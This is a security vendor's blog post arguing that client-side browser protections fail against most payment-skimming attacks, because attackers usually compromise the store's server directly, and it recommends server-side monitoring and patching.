Sorry, client-side security does not work
by Sansec Forensics Team
Published in Threat Research − February 03, 2025
Browser-based protection can easily be bypassed by the majority of digital skimming attacks.
Merchants spend millions of dollars on client-side security solutions to prevent digital skimming attacks. Companies are rushing to implement these tools, often driven by PCI requirements. But here's the reality: these solutions are ineffective against most attacks.
Fact: client-side solutions target symptoms, not the real problem
When malicious code appears on your site, it means your infrastructure has already been compromised. While client-side protection might neutralize malicious frontend code, it does nothing to stop attackers from getting into your system in the first place. Once attackers breach your server, they gain control of:
- Your entire database, including customer and order data
- All server-side code and business logic
- Access to internal systems and networks
- The ability to modify any code or content
You want to prevent thieves getting into your systems, not merely block one of their escape routes.
Fact: client-side security can be easily side-stepped
Client-side security tools are deployed through your server. This creates a fundamental weakness: when attackers control your server, they can simply:
- Remove the security script entirely
- Modify its configuration to allow malicious code
- Insert their skimming code before the security solution loads
Real protection needs to run independent of the thing it is protecting.
The Supply Chain Distraction
Vendors of client-side security know about these fundamental flaws, so they focus their marketing on a particular subset of the malware problem where their solutions could actually make sense: supply chain attacks.
While these attacks sound frightening in vendor presentations, the data tells a different story: the last successful supply chain attack that actually hit stores, occurred in 2019. So vendors are selling a solution to a theoretical problem.
What does happen then in reality? Plain old server hacks. At Sansec, we've been monitoring digital skimming attacks globally. In the last five years, we detected payment skimmers in over 210,000 online stores. Zero (0) skimmers were injected via Javascript supply chain attacks*. The data is unambiguous: attackers inject practically all skimmers through direct server compromises, not through third-party services. This isn't speculation - it's based on years of real-world attack data.
* In fact, Sansec discovered a supply chain attack in 2022 that actually hit stores, however this attack used (server-side) PHP code and could not have been detected nor prevented by a client-side solution.
What Should You Do Instead?
The data is clear: to effectively protect against digital skimming, you need to secure your servers first. This means:
- Monitor for malware and vulnerabilities on the server level
- Implement effective and timely patch procedures
- Run a free CSP monitor for compliance
And are you still considering a client-side solution? Ask potential vendors these questions:
- What do you do to prevent my store getting hacked?
- Why didn't you discover the rogue Polyfill domain?
Don't waste resources on expensive solutions that attackers easily bypass. Focus on where the real attacks happen.
Read more
In this article
Easy CSP for your store?
Try Sansec Watch! Free, simple and fully integrated. Get PCI compliant alerting with minimal effort.
Sansec WatchScan your store now
for malware & vulnerabilities
eComscan is the most thorough security scanner for Magento, Adobe Commerce, Shopware, WooCommerce and many more.
Learn more
